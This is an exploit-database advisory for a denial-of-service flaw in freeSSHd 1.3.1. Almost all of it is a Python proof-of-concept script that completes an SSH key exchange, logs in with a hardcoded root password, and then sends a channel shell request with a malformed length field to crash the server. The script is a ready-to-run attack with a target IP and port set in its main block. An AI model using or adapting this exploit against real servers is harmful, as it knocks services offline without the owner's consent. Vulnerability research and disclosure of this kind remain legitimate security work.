freeSSHd 1.3.1 Denial Of Service

2015-08-28T00:00:00
ID PACKETSTORM:133363
Type packetstorm
Reporter 3unnym00n
Modified 2015-08-28T00:00:00

Description

                                        
                                            `# Exploit title: freesshd 1.3.1 denial of service vulnerability  
# Date: 28-8-2015  
# Vendor homepage: http://www.freesshd.com  
# Software Link: http://www.freesshd.com/freeSSHd.exe  
# Version: 1.3.1  
# Author: 3unnym00n  
  
# Details:  
# ----------------------------------------------  
# byte SSH_MSG_CHANNEL_REQUEST  
# uint32 recipient channel  
# string "shell"  
# boolean want reply  
  
# freeSSHd doesn't correctly handle channel shell request, when the "shell" length malformed can lead crashing  
  
# Tested On: win7, xp  
# operating steps:   
1. in the freeSSHd settings: add a user, named "root", password is "fuckinA"  
2. restart the server to let the configuration take effect  
3. modify the hostname in this py.  
4. running the py, u will see the server crash  
  
  
# remark: u can also modify the user auth service request packet, to adjust different user, different password  
  
  
'''  
  
import socket  
import struct  
import os  
from StringIO import StringIO  
from hashlib import sha1  
from Crypto.Cipher import Blowfish, AES, DES3, ARC4  
from Crypto.Util import Counter  
from hmac import HMAC  
  
## suppose server accept our first dh kex: diffie-hellman-group14-sha1  
P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF  
G = 2  
__sequence_number_out = 3  
  
zero_byte = chr(0)  
one_byte = chr(1)  
four_byte = chr(4)  
max_byte = chr(0xff)  
cr_byte = chr(13)  
linefeed_byte = chr(10)  
crlf = cr_byte + linefeed_byte  
  
class Message (object):  
"""  
An SSH2 message is a stream of bytes that encodes some combination of  
strings, integers, bools, and infinite-precision integers (known in Python  
as longs). This class builds or breaks down such a byte stream.  
  
Normally you don't need to deal with anything this low-level, but it's  
exposed for people implementing custom extensions, or features that  
paramiko doesn't support yet.  
"""  
  
big_int = long(0xff000000)  
  
def __init__(self, content=None):  
"""  
Create a new SSH2 message.  
  
:param str content:  
the byte stream to use as the message content (passed in only when  
decomposing a message).  
"""  
if content is not None:  
self.packet = StringIO(content)  
else:  
self.packet = StringIO()  
  
def __str__(self):  
"""  
Return the byte stream content of this message, as a string/bytes obj.  
"""  
return self.asbytes()  
  
def __repr__(self):  
"""  
Returns a string representation of this object, for debugging.  
"""  
return 'paramiko.Message(' + repr(self.packet.getvalue()) + ')'  
  
def asbytes(self):  
"""  
Return the byte stream content of this Message, as bytes.  
"""  
return self.packet.getvalue()  
  
  
def add_bytes(self, b):  
"""  
Write bytes to the stream, without any formatting.  
  
:param str b: bytes to add  
"""  
self.packet.write(b)  
return self  
  
def add_byte(self, b):  
"""  
Write a single byte to the stream, without any formatting.  
  
:param str b: byte to add  
"""  
self.packet.write(b)  
return self  
  
def add_boolean(self, b):  
"""  
Add a boolean value to the stream.  
  
:param bool b: boolean value to add  
"""  
if b:  
self.packet.write(one_byte)  
else:  
self.packet.write(zero_byte)  
return self  
  
def add_size(self, n):  
"""  
Add an integer to the stream.  
  
:param int n: integer to add  
"""  
self.packet.write(struct.pack('>I', n))  
return self  
  
def add_int(self, n):  
"""  
Add an integer to the stream.  
  
:param int n: integer to add  
"""  
if n >= Message.big_int:  
self.packet.write(max_byte)  
self.add_string(deflate_long(n))  
else:  
self.packet.write(struct.pack('>I', n))  
return self  
  
def add_int(self, n):  
"""  
Add an integer to the stream.  
  
@param n: integer to add  
@type n: int  
"""  
if n >= Message.big_int:  
self.packet.write(max_byte)  
self.add_string(deflate_long(n))  
else:  
self.packet.write(struct.pack('>I', n))  
return self  
  
def add_int64(self, n):  
"""  
Add a 64-bit int to the stream.  
  
:param long n: long int to add  
"""  
self.packet.write(struct.pack('>Q', n))  
return self  
  
def add_mpint(self, z):  
"""  
Add a long int to the stream, encoded as an infinite-precision  
integer. This method only works on positive numbers.  
  
:param long z: long int to add  
"""  
self.add_string(deflate_long(z))  
return self  
  
def add_string(self, s):  
"""  
Add a string to the stream.  
  
:param str s: string to add  
"""  
self.add_size(len(s))  
self.packet.write(s)  
return self  
  
def add_list(self, l):  
"""  
Add a list of strings to the stream. They are encoded identically to  
a single string of values separated by commas. (Yes, really, that's  
how SSH2 does it.)  
  
:param list l: list of strings to add  
"""  
self.add_string(','.join(l))  
return self  
  
def _add(self, i):  
if type(i) is bool:  
return self.add_boolean(i)  
elif isinstance(i, int):  
return self.add_int(i)  
elif type(i) is list:  
return self.add_list(i)  
else:  
return self.add_string(i)  
  
def add(self, *seq):  
"""  
Add a sequence of items to the stream. The values are encoded based  
on their type: str, int, bool, list, or long.  
  
.. warning::  
Longs are encoded non-deterministically. Don't use this method.  
  
:param seq: the sequence of items  
"""  
for item in seq:  
self._add(item)  
  
  
def deflate_long(n, add_sign_padding=True):  
"""turns a long-int into a normalized byte string (adapted from Crypto.Util.number)"""  
# after much testing, this algorithm was deemed to be the fastest  
s = bytes()  
n = long(n)  
while (n != 0) and (n != -1):  
s = struct.pack('>I', n & long(0xffffffff)) + s  
n >>= 32  
# strip off leading zeros, FFs  
for i in enumerate(s):  
if (n == 0) and (i[1] != chr(0)):  
break  
if (n == -1) and (i[1] != chr(0xff)):  
break  
else:  
# degenerate case, n was either 0 or -1  
i = (0,)  
if n == 0:  
s = chr(0)  
else:  
s = chr(0xff)  
s = s[i[0]:]  
if add_sign_padding:  
if (n == 0) and (ord(s[0]) >= 0x80):  
s = chr(0) + s  
if (n == -1) and (ord(s[0]) < 0x80):  
s = chr(0xff) + s  
return s  
  
def inflate_long(s, always_positive=False):  
"""turns a normalized byte string into a long-int (adapted from Crypto.Util.number)"""  
out = long(0)  
negative = 0  
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):  
negative = 1  
if len(s) % 4:  
filler = chr(0)  
if negative:  
filler = chr(0xff)  
# never convert this to ``s +=`` because this is a string, not a number  
# noinspection PyAugmentAssignment  
s = filler * (4 - len(s) % 4) + s  
for i in range(0, len(s), 4):  
out = (out << 32) + struct.unpack('>I', s[i:i+4])[0]  
if negative:  
out -= (long(1) << (8 * len(s)))  
return out  
  
def byte_mask(c, mask):  
return chr(ord(c) & mask)  
  
  
  
  
def _compute_key(K, H, session_id, id, nbytes):  
"""id is 'A' - 'F' for the various keys used by ssh"""  
m = Message()  
m.add_mpint(K)  
m.add_bytes(H)  
m.add_byte(str(id))  
m.add_bytes(session_id)  
out = sofar = sha1(m.asbytes()).digest()  
while len(out) < nbytes:  
m = Message()  
m.add_mpint(K)  
m.add_bytes(H)  
m.add_bytes(sofar)  
digest = sha1(m.asbytes()).digest()  
out += digest  
sofar += digest  
return out[:nbytes]  
  
  
def compute_hmac(key, message, digest_class):  
return HMAC(key, message, digest_class).digest()  
  
  
def read_msg(sock, block_engine_in, block_size, mac_size):  
header = sock.recv(block_size)  
header = block_engine_in.decrypt(header)  
packet_size = struct.unpack('>I', header[:4])[0]  
leftover = header[4:]  
buf = sock.recv(packet_size + mac_size - len(leftover))  
packet = buf[:packet_size - len(leftover)]  
post_packet = buf[packet_size - len(leftover):]  
packet = block_engine_in.decrypt(packet)  
packet = leftover + packet  
  
def send_msg(sock, raw_data, block_engine_out, mac_engine_out, mac_key_out, mac_size):  
global __sequence_number_out  
out = block_engine_out.encrypt(raw_data)  
  
payload = struct.pack('>I', __sequence_number_out) + raw_data  
out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]  
sock.send(out)  
__sequence_number_out += 1  
  
def exploit(hostname, port):  
  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect((hostname, port))  
  
## send client banner  
client_banner = 'SSH-2.0-SUCK\r\n'  
sock.send(client_banner)  
## recv server banner  
server_banner = ''  
while True:  
data = sock.recv(1)  
if data == '\x0a':  
break  
server_banner += data  
  
print 'server banner is: ', server_banner.__repr__()  
  
## do key exchange  
## send client algorithms  
cookie = os.urandom(16)  
  
  
client_kex = '000001cc0514'.decode('hex') + cookie + '000000596469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000237373682d7273612c7373682d6473732c65636473612d736861322d6e69737470323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e65000000000000000000000000000000000000'.decode('hex')  
sock.send(client_kex)  
client_kex_init = client_kex[5:-5]  
  
  
## recv server algorithms  
server_kex = ''  
str_pl = sock.recv(4)  
pl = struct.unpack('>I', str_pl)[0]  
tmp = sock.recv(pl)  
padding_len = ord(tmp[0])  
server_kex_init = tmp[1:-padding_len]  
  
## do dh kex  
## send client dh kex  
x = 2718749950853797850634218108087830670950606437648125981418769990607126772940049948484122336910062802584089370382091267133574445173294378254000629897200925498341633999513190035450218329607097225733329543524028305346861620006860852918487068859161361831623421024322904154569598752827192453199975754781944810347  
e = 24246061990311305114571813286712069338300342406114182522571307971719868860460945648993499340734221725910715550923992743644801884998515491806836377726946636968365751276828870539451268214005738703948104009998575652199698609897222885198283575698226413251759742449790092874540295563182579030702610986594679727200051817630511413715723789617829401744474112405554024371460263485543685109421717171156358397944976970310869333766947439381332202584288225313692797532554689171177447651177476425180162113468471927127194797168639270094144932251842745747512414228391665092351122762389774578913976053048427148163469934452204474329639  
client_dh_kex = '0000010c051e0000010100c010d8c3ea108d1915c9961f86d932f3556b82cd09a7e1d24c88f7d98fc88b19ca3908cada3244dfc5534860b967019560ce5ee243007d41ecf68e9bfa7631847ecb1091558fd7ffe2f17171115690a6d10f3b62c317157ced9291770cc452cc93fb911f18de644ef988c09a3bff35770e99d1546d31c320993f8c12bb275cd2742afc547a0f3309c29a6e72611af965b6144b837ca2003c3ca1f3e35797ab143669b9034c575794c645383519d485a133e67d0793097ef08b72523fa3199c35358676d1fd9776248cae08e46da6414d0f975ffa4b4c84f69db86c47401808daa8a5919fc52ebed157b99e0dd2a4203f0c9e06d6395fa5c9b38a7ae8b159ea270000000000'.decode('hex')  
sock.send(client_dh_kex)  
  
## recv server dh kex  
str_pl = sock.recv(4)  
pl = struct.unpack('>I', str_pl)[0]  
server_dh_kex = sock.recv(pl)  
  
## send client newkeys  
client_newkeys = '0000000c0a1500000000000000000000'.decode('hex')  
sock.send(client_newkeys)  
  
## recv server newkeys  
str_pl = sock.recv(4)  
pl = struct.unpack('>I', str_pl)[0]  
server_new_keys = sock.recv(pl)  
  
  
## calc all we need ...  
host_key_len = struct.unpack('>I', server_dh_kex[2:6])[0]  
# print host_key_len  
host_key = server_dh_kex[6:6 + host_key_len]  
  
f_len = struct.unpack('>I', server_dh_kex[6 + host_key_len:10 + host_key_len])[0]  
str_f = server_dh_kex[10 + host_key_len:10 + host_key_len + f_len]  
dh_server_f = inflate_long(str_f)  
  
sig_len = struct.unpack('>I', server_dh_kex[10 + host_key_len + f_len:14 + host_key_len + f_len])[0]  
sig = server_dh_kex[14 + host_key_len + f_len:14 + host_key_len + f_len + sig_len]  
  
K = pow(dh_server_f, x, P)  
## build up the hash H of (V_C || V_S || I_C || I_S || K_S || e || f || K), aka, session id  
hm = Message()  
  
hm.add(client_banner.rstrip(), server_banner.rstrip(),  
client_kex_init, server_kex_init)  
  
hm.add_string(host_key)  
hm.add_mpint(e)  
hm.add_mpint(dh_server_f)  
hm.add_mpint(K)  
  
H = sha1(hm.asbytes()).digest()  
  
## suppose server accept our first cypher: aes128-ctr, hmac-sha1  
block_size = 16  
key_size = 16  
mac_size = 20  
  
IV_out = _compute_key(K, H, H, 'A', block_size)  
key_out = _compute_key(K, H, H, 'C', key_size)  
  
block_engine_out = AES.new(key_out, AES.MODE_CTR, IV_out, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_out, True)))  
mac_engine_out = sha1  
mac_key_out = _compute_key(K, H, H, 'E', mac_engine_out().digest_size)  
  
IV_in = _compute_key(K, H, H, 'B', block_size)  
key_in = _compute_key(K, H, H, 'D', key_size)  
block_engine_in = AES.new(key_in, AES.MODE_CTR, IV_in, Counter.new(nbits=block_size * 8, initial_value=inflate_long(IV_in, True)))  
mac_engine_in = sha1  
mac_key_in = _compute_key(K, H, H, 'F', mac_engine_in().digest_size)  
  
## do user auth  
## send client service request (user auth)  
client_service_request = '\x00\x00\x00\x1C\x0A\x05\x00\x00\x00\x0C\x73\x73\x68\x2D\x75\x73\x65\x72\x61\x75\x74\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'  
## encrypt the packet  
send_msg(sock, client_service_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)  
  
  
## recv server service accept  
read_msg(sock, block_engine_in, block_size, mac_size)  
  
## send client userauth request  
client_userauth_request = '\x00\x00\x00\x3C\x08\x32'  
## the user name length and username  
client_userauth_request += '\x00\x00\x00\x04'  
client_userauth_request += 'root'  
  
## service  
client_userauth_request += '\x00\x00\x00\x0E'  
client_userauth_request += 'ssh-connection'  
  
## password  
client_userauth_request += '\x00\x00\x00\x08'  
client_userauth_request += 'password'  
client_userauth_request += '\x00'  
  
## plaintext password fuckinA  
client_userauth_request += '\x00\x00\x00\x07'  
client_userauth_request += 'fuckinA'  
  
## padding  
client_userauth_request += '\x00'*8  
  
## encrypt the packet  
print 'send client_userauth_request'  
send_msg(sock, client_userauth_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)  
# out = block_engine_out.encrypt(client_userauth_request)  
# payload = struct.pack('>I', __sequence_number_out) + client_userauth_request  
# out += compute_hmac(mac_key_out, payload, mac_engine_out)[:mac_size]  
# sock.send(out)  
  
  
## recv server userauth success  
print 'recv server userauth success'  
read_msg(sock, block_engine_in, block_size, mac_size)  
  
  
## begin send malformed data  
## send channel open  
client_channel_open = '\x00\x00\x00\x2c\x13\x5a\x00\x00\x00\x07session\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x80\x00' + '\x00'*0x13  
  
  
print 'send client_channel_open'  
send_msg(sock, client_channel_open, block_engine_out, mac_engine_out, mac_key_out, mac_size)  
  
## recv channel open success  
# print 'recv channel open success'  
read_msg(sock, block_engine_in, block_size, mac_size)  
  
## send client channel request  
client_channel_request = '\x00\x00\x00\x3c\x0d\x62\x00\x00\x00\x00\x00\x00\x00\x07pty-req\x01\x00\x00\x00\x05vt100\x00\x00\x00\x50\x00\x00\x00\x18' \  
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00'*0x0d  
  
  
print 'send client_channel_request'  
send_msg(sock, client_channel_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)  
  
## recv server pty success  
# print 'recv server pty success'  
read_msg(sock, block_engine_in, block_size, mac_size)  
  
  
## send client shell request  
client_shell_request = '\x00\x00\x00\x1c\x0c\x62\x00\x00\x00\x00'  
client_shell_request += '\x6a\x0b\xd8\xdashell' # malformed  
client_shell_request += '\x01'  
client_shell_request += '\x00'*0x0c  
  
print 'send client_shell_request'  
send_msg(sock, client_shell_request, block_engine_out, mac_engine_out, mac_key_out, mac_size)  
# print 'recv server shell success'  
# read_msg(sock, block_engine_in, block_size, mac_size)  
  
  
  
if __name__ == '__main__':  
  
hostname = '192.168.242.128'  
port = 22  
exploit(hostname, port)  
  
`